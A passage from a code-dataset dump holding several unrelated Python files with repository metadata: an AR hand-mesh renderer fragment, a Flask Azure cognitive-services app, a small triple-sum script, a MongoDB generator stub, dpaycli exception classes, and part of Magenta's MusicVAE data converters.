V[:]['a_position'][mapped_coord.shape[0]:, :3] *= scale
######################
# New Hand Mesh
######################
view_pos = np.dot(np.linalg.inv(c.projection.T), mapped_coord.T)
model_pos = np.dot(np.linalg.inv(c.view.T), view_pos)
world_pos = np.dot(np.linalg.inv(c.model.T), model_pos)
world_pos = world_pos / world_pos[3, :]
V[:]['a_position'][:mapped_coord.shape[0], :] = world_pos.transpose(1, 0)
hand_mesh = np.zeros((778, 3))
for i in range(778):
hand_mesh[i] = V[:]['a_position'][old2new_matching[i], :3]
joint = np.dot(hand_layer.joint_regressor, hand_mesh)
######################
# Object Transformation
######################
object_verts = V[:]['a_position'][mapped_coord.shape[0]:, :3]
object_center = np.average(object_verts, axis=0)
# Rotation
new_x = V[:]['a_position'][144, :3] - V[:]['a_position'][145, :3]
new_x = new_x / np.linalg.norm(new_x)
new_y = V[:]['a_position'][144, :3] - V[:]['a_position'][146, :3]
new_y = new_y / np.linalg.norm(new_y)
new_z = np.cross(new_x, new_y)
new_z = new_z / np.linalg.norm(new_z)
new_y = np.cross(new_x, new_z)
new_y = new_y / np.linalg.norm(new_y)
M_n = np.array([[new_x[0], new_x[1], new_x[2]],
[new_y[0], new_y[1], new_y[2]],
[new_z[0], new_z[1], new_z[2]]])
M_n = rvec_smoothing(M_n)
adjust = np.zeros((3, 3))
V[:]['a_position'][mapped_coord.shape[0]:, :3] = np.dot(M_n.T, np.dot(np.linalg.inv(M_o.T),
V[:]['a_position'][mapped_coord.shape[0]:,
:3].T)).T
pos = tvec_smoothing(V[:]['a_position'][145, :3])
V[:]['a_position'][mapped_coord.shape[0]:, :3] += pos
c.vertices_buff.set_data(V)
    light_mat = np.zeros((4, 4)).astype(float)  # np.float was removed in NumPy 1.24; plain float is equivalent
light_mat[:3, :3] = np.dot(M_n.T, np.linalg.inv(M_o.T))
light_mat[-1, -1] = 1
c.program['u_light_mat'] = light_mat
c.update()
frame_render = c.render()
frame_render = np.array(frame_render[:, :, 0:3])
frame_render = cv2.cvtColor(frame_render, cv2.COLOR_RGB2BGR)
hsv = cv2.cvtColor(frame_render, cv2.COLOR_BGR2HSV)
hand_mask = cv2.inRange(hsv, (60, 0, 0), (80, 256, 256))
######################
# Hand Mesh
######################
result = frame.copy()
result[np.where(hand_mask == 0)] = frame_render[np.where(hand_mask == 0)]
cv2.imshow('frame', result)
key = cv2.waitKey(1)
if key == ord('q'):
break
|
[
"1155116223@link.cuhk.edu.hk"
] |
1155116223@link.cuhk.edu.hk
|
53883e8800ced687ff86dd92e63e098998975a37
|
1ee096359c79d095c2bb11b15b1bec7442b62f6c
|
/app.py
|
cb4845f2591355844287947d756c68fc9472c6c4
|
[
"MIT"
] |
permissive
|
lordserch/flask-azure-cognitive-services
|
4f3961c779c8a83c6160d6585221e834c35658ea
|
2d66718df90e8ea02f1a7c26f68af1f8a93c29a7
|
refs/heads/master
| 2020-06-16T13:01:16.987200
| 2019-07-06T21:58:42
| 2019-07-06T21:58:42
| 195,583,713
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,393
|
py
|
import translate, os, sentiment, synthesize
from flask import Flask, render_template, url_for, jsonify, request, send_from_directory
app = Flask(__name__)
app.config['JSON_AS_ASCII'] = False
@app.route('/')
def index():
return render_template('index.html')
@app.route('/translate-text', methods=['POST'])
def translate_text():
data = request.get_json()
text_input = data['text']
translation_output = data['to']
response = translate.get_translation(text_input, translation_output)
return jsonify(response)
@app.route('/favicon.ico')
def favicon():
return send_from_directory(os.path.join(app.root_path, 'static'),
'favicon.ico', mimetype='image/vnd.microsoft.icon')
@app.route('/sentiment-analysis', methods=['POST'])
def sentiment_analysis():
data = request.get_json()
input_text = data['inputText']
input_lang = data['inputLanguage']
output_text = data['outputText']
output_lang = data['outputLanguage']
response = sentiment.get_sentiment(input_text, input_lang, output_text, output_lang)
return jsonify(response)
@app.route('/text-to-speech', methods=['POST'])
def text_to_speech():
data = request.get_json()
text_input = data['text']
voice_font = data['voice']
tts = synthesize.TextToSpeech(text_input, voice_font)
tts.get_token()
audio_response = tts.save_audio()
return audio_response
|
[
"sergiorol@hotmail.com"
] |
sergiorol@hotmail.com
|
e5d1f6d1168b0b81451e306681670034888c9b43
|
db24baee3c6054fe55498dd1c66e55bee54a1305
|
/allposibilityofijk.py
|
e516682b6452a0e7bf79200036365a04c3023043
|
[] |
no_license
|
aksharyash/CodeKata-GUVI
|
cb0ff6f2d4193d94dd8b0dcc31de0973eb315907
|
7d523f4530b46f0e4da375295d8de19d4faa1bf5
|
refs/heads/master
| 2020-06-21T09:40:37.731312
| 2019-08-14T07:51:27
| 2019-08-14T07:51:27
| 197,411,237
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 329
|
py
|
n = int(input())
inp = list(map(int, input().split()))
# all triples with i < j < k where inp[i] + inp[j] == inp[k]
# e.g. input "4" then "1 2 3 5" -> "1 2 3" and "2 3 5"
lst = [[inp[i], inp[j], inp[k]]
       for i in range(len(inp))
       for j in range(len(inp))
       for k in range(len(inp))
       if inp[i] + inp[j] == inp[k] and i < j < k]
for triple in lst:
    # the original compared ints against '[', ']' and ',' (never true),
    # so it effectively printed every element; do that directly
    print(*triple)
|
[
"noreply@github.com"
] |
aksharyash.noreply@github.com
|
09e0445c83d6ca20cec8fb1da65e4af21fabe937
|
3506a6ecd58698af0415ca7300d9f43e2f3a27c0
|
/environment_creator/main_env_creator.py
|
61d3bf1ea4bd3a3871ea53609935aed2e7cf7487
|
[] |
no_license
|
FernandoFuentesArija/marketing_de
|
1803887f8f200d8f8db478968be41b1781d5bd80
|
5c7fb11874e85ab8295158b2b71c186e39d0b065
|
refs/heads/master
| 2020-04-13T00:23:59.468129
| 2019-06-13T21:13:07
| 2019-06-13T21:13:07
| 162,844,410
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 360
|
py
|
from bbdd_manager.Mongo_manager import Mongo_manager
from bbdd_manager import ConfigVariablesBbdd
from environment_creator.Object_generator import Object_generator
# Create a connection to the database
bbdd_connec = Mongo_manager(ConfigVariablesBbdd.env_database)
# Create the generator object
og1 = Object_generator(bbdd_connec)
og1.create_json_with_objects("PERSON",10000)
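# Note (assumption, since Object_generator is not shown in this file): the
# call above is expected to serialize 10,000 generated "PERSON" documents to
# JSON through the Mongo-backed connection created earlier.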
|
[
"fernando_fuentes_arija@yahoo.es"
] |
fernando_fuentes_arija@yahoo.es
|
c4b13827dd26e6eb1f2560c0927b0bfa450019ad
|
37d36adb9284f9ff19e9cc6ec3f323ef59b2473b
|
/a3/ps3.py
|
ac9e1a3ad4ed1abfc3f065b47582fa896a785304
|
[] |
no_license
|
mfidler88/sem2-s2018
|
35c55d75020b2b5ecc5f1c8ea6459a0680a5c00c
|
9f6ba355b21011582fa82e90b504023187801add
|
refs/heads/master
| 2021-09-13T04:52:23.065894
| 2018-04-25T05:26:04
| 2018-04-25T05:26:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,340
|
py
|
[File body omitted: the original /a3/ps3.py content is an OpenSSL "Salted__" base64-encoded encrypted blob, so no Python source is recoverable from this dump.]
|
[
"kfidler6@gatech.edu"
] |
kfidler6@gatech.edu
|
61d2fc0ef44c6b1c5dfaf62f9463947621867fc9
|
a22cc323b29f50da397d8363ac2521e3542a0fd7
|
/dpaycli/exceptions.py
|
bae39e29196bee7aae8c59769ed5783a861fb228
|
[
"MIT"
] |
permissive
|
dpays/dpay-cli
|
1a58c7dae45218e3b05b7e17ff5ce03e918d27b9
|
dfa80898e1faea2cee92ebec6fe04873381bd40f
|
refs/heads/master
| 2020-04-01T09:26:43.200933
| 2018-10-15T08:03:06
| 2018-10-15T08:03:06
| 153,075,154
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,993
|
py
|
# This Python file uses the following encoding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
class WalletExists(Exception):
""" A wallet has already been created and requires a password to be
unlocked by means of :func:`dpay.wallet.unlock`.
"""
pass
class WalletLocked(Exception):
""" Wallet is locked
"""
pass
class RPCConnectionRequired(Exception):
""" An RPC connection is required
"""
pass
class InvalidMemoKeyException(Exception):
""" Memo key in message is invalid
"""
pass
class WrongMemoKey(Exception):
""" The memo provided is not equal the one on the blockchain
"""
pass
class OfflineHasNoRPCException(Exception):
""" When in offline mode, we don't have RPC
"""
pass
class AccountExistsException(Exception):
""" The requested account already exists
"""
pass
class AccountDoesNotExistsException(Exception):
""" The account does not exist
"""
pass
class AssetDoesNotExistsException(Exception):
""" The asset does not exist
"""
pass
class InvalidAssetException(Exception):
""" An invalid asset has been provided
"""
pass
class InsufficientAuthorityError(Exception):
""" The transaction requires signature of a higher authority
"""
pass
class VotingInvalidOnArchivedPost(Exception):
""" The transaction requires signature of a higher authority
"""
pass
class MissingKeyError(Exception):
""" A required key couldn't be found in the wallet
"""
pass
class InvalidWifError(Exception):
""" The provided private Key has an invalid format
"""
pass
class BlockDoesNotExistsException(Exception):
""" The block does not exist
"""
pass
class NoWalletException(Exception):
""" No Wallet could be found, please use :func:`dpay.wallet.create` to
create a new wallet
"""
pass
class WitnessDoesNotExistsException(Exception):
""" The witness does not exist
"""
pass
class ContentDoesNotExistsException(Exception):
""" The content does not exist
"""
pass
class VoteDoesNotExistsException(Exception):
""" The vote does not exist
"""
pass
class WrongMasterPasswordException(Exception):
""" The password provided could not properly unlock the wallet
"""
pass
class VestingBalanceDoesNotExistsException(Exception):
""" Vesting Balance does not exist
"""
pass
class InvalidMessageSignature(Exception):
""" The message signature does not fit the message
"""
pass
class NoWriteAccess(Exception):
""" Cannot store to sqlite3 database due to missing write access
"""
pass
class BatchedCallsNotSupported(Exception):
""" Batch calls do not work
"""
pass
class BlockWaitTimeExceeded(Exception):
""" Wait time for new block exceeded
"""
pass
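def _example_unlock(wallet, password):
    """Illustrative sketch only (not part of the original module): shows how
    a caller might branch on the exception types defined above. The `wallet`
    object and its `unlock` method are assumed for the example."""
    try:
        wallet.unlock(password)
    except WrongMasterPasswordException:
        return 'wrong-password'
    except WalletLocked:
        return 'still-locked'
    return 'unlocked'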
|
[
"jaredricelegal@gmail.com"
] |
jaredricelegal@gmail.com
|
b29f17221b216cea2a7f3cddbe1c3513bde59920
|
ef3568b08d0e99f57a0feb2882f2c65c1e97dd80
|
/magenta/models/music_vae/data.py
|
d176d7c4eec90f8fd229ef4b2f8ea9a7be9128ba
|
[
"Apache-2.0"
] |
permissive
|
SeanHsieh/magenta
|
ccf6d31ad93b036fb93f16d7ab387e0670f934db
|
9794130b40d6e8131a7d6dd9698d935633c5d4cc
|
refs/heads/master
| 2021-04-27T13:26:23.952856
| 2018-02-22T00:36:30
| 2018-02-22T00:36:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 42,363
|
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MusicVAE data library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import copy
import functools
import itertools
import random
# internal imports
import numpy as np
import tensorflow as tf
import magenta.music as mm
from magenta.music import chord_symbols_lib
from magenta.music import drums_encoder_decoder
from magenta.music import sequences_lib
from magenta.protobuf import music_pb2
PIANO_MIN_MIDI_PITCH = 21
PIANO_MAX_MIDI_PITCH = 108
MIN_MIDI_PITCH = 0
MAX_MIDI_PITCH = 127
MIDI_PITCHES = 128
MAX_INSTRUMENT_NUMBER = 127
MEL_PROGRAMS = range(0, 32) # piano, chromatic percussion, organ, guitar
BASS_PROGRAMS = range(32, 40)
ELECTRIC_BASS_PROGRAM = 33
REDUCED_DRUM_PITCH_CLASSES = drums_encoder_decoder.DEFAULT_DRUM_TYPE_PITCHES
FULL_DRUM_PITCH_CLASSES = [ # 61 classes
[p] for c in drums_encoder_decoder.DEFAULT_DRUM_TYPE_PITCHES for p in c]
CHORD_SYMBOL = music_pb2.NoteSequence.TextAnnotation.CHORD_SYMBOL
def _maybe_pad_seqs(seqs, dtype):
"""Pads sequences to match the longest and returns as a numpy array."""
if not len(seqs): # pylint:disable=g-explicit-length-test
return np.zeros((0, 0, 0), dtype)
lengths = [len(s) for s in seqs]
if len(set(lengths)) == 1:
return np.array(seqs, dtype)
else:
length = max(lengths)
return (np.array([np.pad(s, [(0, length - len(s)), (0, 0)], mode='constant')
for s in seqs], dtype))
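# Example: given sequences of shapes (2, 3) and (4, 3), _maybe_pad_seqs
# returns an array of shape (2, 4, 3), with the shorter sequence zero-padded
# at the end of its first axis.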
def _extract_instrument(note_sequence, instrument):
extracted_ns = copy.copy(note_sequence)
del extracted_ns.notes[:]
extracted_ns.notes.extend(
n for n in note_sequence.notes if n.instrument == instrument)
return extracted_ns
def np_onehot(indices, depth, dtype=np.bool):
"""Converts 1D array of indices to a one-hot 2D array with given depth."""
onehot_seq = np.zeros((len(indices), depth), dtype=dtype)
onehot_seq[np.arange(len(indices)), indices] = 1.0
return onehot_seq
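# Example: np_onehot([0, 2], depth=3) yields
#   [[ True, False, False],
#    [False, False,  True]]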
class NoteSequenceAugmenter(object):
"""Class for augmenting NoteSequences.
Args:
transpose_range: A tuple containing the inclusive, integer range of
transpose amounts to sample from. If None, no transposition is applied.
stretch_range: A tuple containing the inclusive, float range of stretch
amounts to sample from.
  """
def __init__(self, transpose_range=None, stretch_range=None):
self._transpose_range = transpose_range
self._stretch_range = stretch_range
def augment(self, note_sequence):
"""Python implementation that augments the NoteSequence."""
trans_amt = (random.randint(*self._transpose_range)
if self._transpose_range else 0)
stretch_factor = (random.uniform(*self._stretch_range)
if self._stretch_range else 1.0)
augmented_ns = copy.deepcopy(note_sequence)
del augmented_ns.notes[:]
for note in note_sequence.notes:
aug_pitch = note.pitch
if not note.is_drum:
aug_pitch += trans_amt
if MIN_MIDI_PITCH <= aug_pitch <= MAX_MIDI_PITCH:
augmented_ns.notes.add().CopyFrom(note)
augmented_ns.notes[-1].pitch = aug_pitch
for ta in augmented_ns.text_annotations:
if ta.annotation_type == CHORD_SYMBOL and ta.text != mm.NO_CHORD:
try:
figure = chord_symbols_lib.transpose_chord_symbol(ta.text, trans_amt)
except chord_symbols_lib.ChordSymbolException:
tf.logging.warning('Unable to transpose chord symbol: %s', ta.text)
figure = mm.NO_CHORD
ta.text = figure
augmented_ns = sequences_lib.stretch_note_sequence(
augmented_ns, stretch_factor)
return augmented_ns
def tf_augment(self, note_sequence_scalar):
"""TF op that augments the NoteSequence."""
def _augment_str(note_sequence_str):
note_sequence = music_pb2.NoteSequence.FromString(note_sequence_str)
augmented_ns = self.augment(note_sequence)
return [augmented_ns.SerializeToString()]
augmented_note_sequence_scalar = tf.py_func(
_augment_str,
[note_sequence_scalar],
tf.string,
name='augment')
augmented_note_sequence_scalar.set_shape(())
return augmented_note_sequence_scalar
class ConverterTensors(collections.namedtuple(
'ConverterTensors', ['inputs', 'outputs', 'controls', 'lengths'])):
"""Tuple of tensors output by `to_tensors` method in converters.
Attributes:
inputs: Input tensors to feed to the encoder.
outputs: Output tensors to feed to the decoder.
controls: (Optional) tensors to use as controls for both encoding and
decoding.
lengths: Length of each input/output/control sequence.
"""
def __new__(cls, inputs=None, outputs=None, controls=None, lengths=None):
if inputs is None:
inputs = []
if outputs is None:
outputs = []
if lengths is None:
lengths = [len(i) for i in inputs]
if not controls:
controls = [np.zeros([l, 0]) for l in lengths]
return super(ConverterTensors, cls).__new__(
cls, inputs, outputs, controls, lengths)
class BaseConverter(object):
"""Base class for data converters between items and tensors.
Inheriting classes must implement the following abstract methods:
-`_to_tensors`
-`_to_items`
"""
__metaclass__ = abc.ABCMeta
def __init__(self, input_depth, input_dtype, output_depth, output_dtype,
control_depth=0, control_dtype=np.bool, end_token=None,
max_tensors_per_item=None,
str_to_item_fn=lambda s: s, length_shape=()):
"""Initializes BaseConverter.
Args:
input_depth: Depth of final dimension of input (encoder) tensors.
input_dtype: DType of input (encoder) tensors.
output_depth: Depth of final dimension of output (decoder) tensors.
output_dtype: DType of output (decoder) tensors.
control_depth: Depth of final dimension of control tensors, or zero if not
conditioning on control tensors.
control_dtype: DType of control tensors.
end_token: Optional end token.
max_tensors_per_item: The maximum number of outputs to return for each
input.
str_to_item_fn: Callable to convert raw string input into an item for
conversion.
length_shape: Shape of length returned by `to_tensor`.
"""
self._input_depth = input_depth
self._input_dtype = input_dtype
self._output_depth = output_depth
self._output_dtype = output_dtype
self._control_depth = control_depth
self._control_dtype = control_dtype
self._end_token = end_token
self._max_tensors_per_input = max_tensors_per_item
self._str_to_item_fn = str_to_item_fn
self._is_training = False
self._length_shape = length_shape
@property
def is_training(self):
return self._is_training
@property
def str_to_item_fn(self):
return self._str_to_item_fn
@is_training.setter
def is_training(self, value):
self._is_training = value
@property
def max_tensors_per_item(self):
return self._max_tensors_per_input
@max_tensors_per_item.setter
def max_tensors_per_item(self, value):
self._max_tensors_per_input = value
@property
def end_token(self):
"""End token, or None."""
return self._end_token
@property
def input_depth(self):
"""Dimension of inputs (to encoder) at each timestep of the sequence."""
return self._input_depth
@property
def input_dtype(self):
"""DType of inputs (to encoder)."""
return self._input_dtype
@property
def output_depth(self):
"""Dimension of outputs (from decoder) at each timestep of the sequence."""
return self._output_depth
@property
def output_dtype(self):
"""DType of outputs (from decoder)."""
return self._output_dtype
@property
def control_depth(self):
"""Dimension of control inputs at each timestep of the sequence."""
return self._control_depth
@property
def control_dtype(self):
"""DType of control inputs."""
return self._control_dtype
@property
def length_shape(self):
"""Shape of length returned by `to_tensor`."""
return self._length_shape
@abc.abstractmethod
def _to_tensors(self, item):
"""Implementation that converts item into encoder/decoder tensors.
Args:
item: Item to convert.
Returns:
A ConverterTensors struct containing encoder inputs, decoder outputs,
(optional) control tensors used for both encoding and decoding, and
sequence lengths.
"""
pass
@abc.abstractmethod
def _to_items(self, samples, controls=None):
"""Implementation that decodes model samples into list of items."""
pass
def _maybe_sample_outputs(self, outputs):
"""If should limit outputs, returns up to limit (randomly if training)."""
if (not self.max_tensors_per_item or
len(outputs) <= self.max_tensors_per_item):
return outputs
if self.is_training:
indices = set(np.random.choice(
len(outputs), size=self.max_tensors_per_item, replace=False))
return [outputs[i] for i in indices]
else:
return outputs[:self.max_tensors_per_item]
def to_tensors(self, item):
"""Python method that converts `item` into list of tensors."""
tensors = self._to_tensors(item)
sampled_results = self._maybe_sample_outputs(list(zip(*tensors)))
return (ConverterTensors(*zip(*sampled_results))
if sampled_results else ConverterTensors())
def _combine_to_tensor_results(self, to_tensor_results):
"""Combines the results of multiple to_tensors calls into one result."""
results = []
for result in to_tensor_results:
results.extend(zip(*result))
sampled_results = self._maybe_sample_outputs(results)
return (ConverterTensors(*zip(*sampled_results))
if sampled_results else ConverterTensors())
def to_items(self, samples, controls=None):
"""Python method that decodes samples into list of items."""
if controls is None:
return self._to_items(samples)
else:
return self._to_items(samples, controls)
def tf_to_tensors(self, item_scalar):
"""TensorFlow op that converts item into output tensors.
Sequences will be padded to match the length of the longest.
Args:
item_scalar: A scalar of type tf.String containing the raw item to be
converted to tensors.
Returns:
inputs: A Tensor, shaped [num encoded seqs, max(lengths), input_depth],
containing the padded input encodings.
outputs: A Tensor, shaped [num encoded seqs, max(lengths), output_depth],
containing the padded output encodings resulting from the input.
controls: A Tensor, shaped
[num encoded seqs, max(lengths), control_depth], containing the padded
control encodings.
lengths: A tf.int32 Tensor, shaped [num encoded seqs], containing the
unpadded lengths of the tensor sequences resulting from the input.
"""
def _convert_and_pad(item_str):
item = self.str_to_item_fn(item_str)
tensors = self.to_tensors(item)
inputs = _maybe_pad_seqs(tensors.inputs, self.input_dtype)
outputs = _maybe_pad_seqs(tensors.outputs, self.output_dtype)
controls = _maybe_pad_seqs(tensors.controls, self.control_dtype)
return inputs, outputs, controls, np.array(tensors.lengths, np.int32)
inputs, outputs, controls, lengths = tf.py_func(
_convert_and_pad,
[item_scalar],
[self.input_dtype, self.output_dtype, self.control_dtype, tf.int32],
name='convert_and_pad')
inputs.set_shape([None, None, self.input_depth])
outputs.set_shape([None, None, self.output_depth])
controls.set_shape([None, None, self.control_depth])
lengths.set_shape([None] + list(self.length_shape))
return inputs, outputs, controls, lengths
def preprocess_notesequence(note_sequence, presplit_on_time_changes):
"""Preprocesses a single NoteSequence, resulting in multiple sequences."""
if presplit_on_time_changes:
note_sequences = sequences_lib.split_note_sequence_on_time_changes(
note_sequence)
else:
note_sequences = [note_sequence]
return note_sequences
class BaseNoteSequenceConverter(BaseConverter):
"""Base class for NoteSequence data converters.
Inheriting classes must implement the following abstract methods:
-`_to_tensors`
-`_to_notesequences`
"""
__metaclass__ = abc.ABCMeta
def __init__(self, input_depth, input_dtype, output_depth, output_dtype,
control_depth=0, control_dtype=np.bool, end_token=None,
presplit_on_time_changes=True,
max_tensors_per_notesequence=None):
"""Initializes BaseNoteSequenceConverter.
Args:
input_depth: Depth of final dimension of input (encoder) tensors.
input_dtype: DType of input (encoder) tensors.
output_depth: Depth of final dimension of output (decoder) tensors.
output_dtype: DType of output (decoder) tensors.
control_depth: Depth of final dimension of control tensors, or zero if not
conditioning on control tensors.
control_dtype: DType of control tensors.
end_token: Optional end token.
presplit_on_time_changes: Whether to split NoteSequence on time changes
before converting.
max_tensors_per_notesequence: The maximum number of outputs to return
for each NoteSequence.
"""
super(BaseNoteSequenceConverter, self).__init__(
input_depth, input_dtype, output_depth, output_dtype,
control_depth, control_dtype, end_token,
max_tensors_per_item=max_tensors_per_notesequence,
str_to_item_fn=music_pb2.NoteSequence.FromString)
self._presplit_on_time_changes = presplit_on_time_changes
@property
def max_tensors_per_notesequence(self):
return self.max_tensors_per_item
@max_tensors_per_notesequence.setter
def max_tensors_per_notesequence(self, value):
self.max_tensors_per_item = value
@abc.abstractmethod
def _to_notesequences(self, samples, controls=None):
"""Implementation that decodes model samples into list of NoteSequences."""
pass
def to_notesequences(self, samples, controls=None):
"""Python method that decodes samples into list of NoteSequences."""
return self._to_items(samples, controls)
def to_tensors(self, note_sequence):
"""Python method that converts `note_sequence` into list of tensors."""
note_sequences = preprocess_notesequence(
note_sequence, self._presplit_on_time_changes)
results = []
for ns in note_sequences:
results.append(super(BaseNoteSequenceConverter, self).to_tensors(ns))
return self._combine_to_tensor_results(results)
def _to_items(self, samples, controls=None):
"""Python method that decodes samples into list of NoteSequences."""
if controls is None:
return self._to_notesequences(samples)
else:
return self._to_notesequences(samples, controls)
class LegacyEventListOneHotConverter(BaseNoteSequenceConverter):
"""Converts NoteSequences using legacy OneHotEncoding framework.
Quantizes the sequences, extracts event lists in the requested size range,
uniquifies, and converts to encoding. Uses the OneHotEncoding's
output encoding for both the input and output.
Args:
event_list_fn: A function that returns a new EventSequence.
  event_extractor_fn: A function for extracting events into EventSequences. The
sole input should be the quantized NoteSequence.
legacy_encoder_decoder: An instantiated OneHotEncoding object to use.
add_end_token: Whether or not to add an end token. Recommended to be False
for fixed-length outputs.
slice_bars: Optional size of window to slide over raw event lists after
extraction.
steps_per_quarter: The number of quantization steps per quarter note.
    Mutually exclusive with `steps_per_second`.
  steps_per_second: The number of quantization steps per second.
    Mutually exclusive with `steps_per_quarter`.
quarters_per_bar: The number of quarter notes per bar.
pad_to_total_time: Pads each input/output tensor to the total time of the
NoteSequence.
max_tensors_per_notesequence: The maximum number of outputs to return
for each NoteSequence.
presplit_on_time_changes: Whether to split NoteSequence on time changes
before converting.
"""
def __init__(self, event_list_fn, event_extractor_fn,
legacy_encoder_decoder, add_end_token=False, slice_bars=None,
slice_steps=None, steps_per_quarter=None, steps_per_second=None,
quarters_per_bar=4, pad_to_total_time=False,
max_tensors_per_notesequence=None,
presplit_on_time_changes=True):
if (steps_per_quarter, steps_per_second).count(None) != 1:
raise ValueError(
'Exactly one of `steps_per_quarter` and `steps_per_second` should be '
'provided.')
if (slice_bars, slice_steps).count(None) == 0:
raise ValueError(
'At most one of `slice_bars` and `slice_steps` should be provided.')
self._event_list_fn = event_list_fn
self._event_extractor_fn = event_extractor_fn
self._legacy_encoder_decoder = legacy_encoder_decoder
self._steps_per_quarter = steps_per_quarter
if steps_per_quarter:
self._steps_per_bar = steps_per_quarter * quarters_per_bar
self._steps_per_second = steps_per_second
if slice_bars:
self._slice_steps = self._steps_per_bar * slice_bars
else:
self._slice_steps = slice_steps
self._pad_to_total_time = pad_to_total_time
depth = legacy_encoder_decoder.num_classes + add_end_token
super(LegacyEventListOneHotConverter, self).__init__(
input_depth=depth,
input_dtype=np.bool,
output_depth=depth,
output_dtype=np.bool,
end_token=legacy_encoder_decoder.num_classes if add_end_token else None,
presplit_on_time_changes=presplit_on_time_changes,
max_tensors_per_notesequence=max_tensors_per_notesequence)
def _to_tensors(self, note_sequence):
"""Converts NoteSequence to unique, one-hot tensor sequences."""
try:
if self._steps_per_quarter:
quantized_sequence = mm.quantize_note_sequence(
note_sequence, self._steps_per_quarter)
if (mm.steps_per_bar_in_quantized_sequence(quantized_sequence) !=
self._steps_per_bar):
return ConverterTensors()
else:
quantized_sequence = mm.quantize_note_sequence_absolute(
note_sequence, self._steps_per_second)
except (mm.BadTimeSignatureException, mm.NonIntegerStepsPerBarException,
            mm.NegativeTimeException):
return ConverterTensors()
event_lists, unused_stats = self._event_extractor_fn(quantized_sequence)
if self._pad_to_total_time:
for e in event_lists:
e.set_length(len(e) + e.start_step, from_left=True)
e.set_length(quantized_sequence.total_quantized_steps)
if self._slice_steps:
sliced_event_tuples = []
for l in event_lists:
for i in range(self._slice_steps, len(l) + 1, self._steps_per_bar):
sliced_event_tuples.append(tuple(l[i - self._slice_steps: i]))
else:
sliced_event_tuples = [tuple(l) for l in event_lists]
# TODO(adarob): Consider handling the fact that different event lists can
# be mapped to identical tensors by the encoder_decoder (e.g., Drums).
unique_event_tuples = list(set(sliced_event_tuples))
unique_event_tuples = self._maybe_sample_outputs(unique_event_tuples)
seqs = []
for t in unique_event_tuples:
seqs.append(np_onehot(
[self._legacy_encoder_decoder.encode_event(e) for e in t] +
([] if self.end_token is None else [self.end_token]),
self.output_depth, self.output_dtype))
return ConverterTensors(inputs=seqs, outputs=seqs)
def _to_notesequences(self, samples):
output_sequences = []
for sample in samples:
s = np.argmax(sample, axis=-1)
if self.end_token is not None and self.end_token in s.tolist():
s = s[:s.tolist().index(self.end_token)]
event_list = self._event_list_fn()
for e in s:
assert e != self.end_token
event_list.append(self._legacy_encoder_decoder.decode_event(e))
output_sequences.append(event_list.to_sequence(velocity=80))
return output_sequences
class OneHotMelodyConverter(LegacyEventListOneHotConverter):
"""Converter for legacy MelodyOneHotEncoding.
Args:
min_pitch: The minimum pitch to model. Those below this value will be
ignored.
max_pitch: The maximum pitch to model. Those above this value will be
ignored.
valid_programs: Optional set of program numbers to allow.
skip_polyphony: Whether to skip polyphonic instruments. If False, the
highest pitch will be taken in polyphonic sections.
max_bars: Optional maximum number of bars per extracted melody, before
slicing.
slice_bars: Optional size of window to slide over raw Melodies after
extraction.
gap_bars: If this many bars or more of non-events follow a note event, the
melody is ended. Disabled when set to 0 or None.
steps_per_quarter: The number of quantization steps per quarter note.
quarters_per_bar: The number of quarter notes per bar.
pad_to_total_time: Pads each input/output tensor to the total time of the
NoteSequence.
add_end_token: Whether to add an end token at the end of each sequence.
max_tensors_per_notesequence: The maximum number of outputs to return
for each NoteSequence.
"""
def __init__(self, min_pitch=PIANO_MIN_MIDI_PITCH,
max_pitch=PIANO_MAX_MIDI_PITCH, valid_programs=None,
skip_polyphony=False, max_bars=None, slice_bars=None,
gap_bars=1.0, steps_per_quarter=4, quarters_per_bar=4,
add_end_token=False, pad_to_total_time=False,
max_tensors_per_notesequence=5, presplit_on_time_changes=True):
self._min_pitch = min_pitch
self._max_pitch = max_pitch
self._valid_programs = valid_programs
steps_per_bar = steps_per_quarter * quarters_per_bar
max_steps_truncate = steps_per_bar * max_bars if max_bars else None
def melody_fn():
return mm.Melody(
steps_per_bar=steps_per_bar, steps_per_quarter=steps_per_quarter)
melody_extractor_fn = functools.partial(
mm.extract_melodies,
min_bars=1,
gap_bars=gap_bars or float('inf'),
max_steps_truncate=max_steps_truncate,
min_unique_pitches=1,
ignore_polyphonic_notes=not skip_polyphony,
pad_end=True)
super(OneHotMelodyConverter, self).__init__(
melody_fn,
melody_extractor_fn,
mm.MelodyOneHotEncoding(min_pitch, max_pitch + 1),
add_end_token=add_end_token,
slice_bars=slice_bars,
pad_to_total_time=pad_to_total_time,
steps_per_quarter=steps_per_quarter,
quarters_per_bar=quarters_per_bar,
max_tensors_per_notesequence=max_tensors_per_notesequence,
presplit_on_time_changes=presplit_on_time_changes)
def _to_tensors(self, note_sequence):
def is_valid(note):
if (self._valid_programs is not None and
note.program not in self._valid_programs):
return False
return self._min_pitch <= note.pitch <= self._max_pitch
notes = list(note_sequence.notes)
del note_sequence.notes[:]
note_sequence.notes.extend([n for n in notes if is_valid(n)])
return super(OneHotMelodyConverter, self)._to_tensors(note_sequence)
class DrumsConverter(BaseNoteSequenceConverter):
"""Converter for legacy drums with either pianoroll or one-hot tensors.
Inputs/outputs are either a "pianoroll"-like encoding of all possible drum
hits at a given step, or a one-hot encoding of the pianoroll.
The "roll" input encoding includes a final NOR bit (after the optional end
token).
Args:
max_bars: Optional maximum number of bars per extracted drums, before
slicing.
slice_bars: Optional size of window to slide over raw Melodies after
extraction.
gap_bars: If this many bars or more follow a non-empty drum event, the
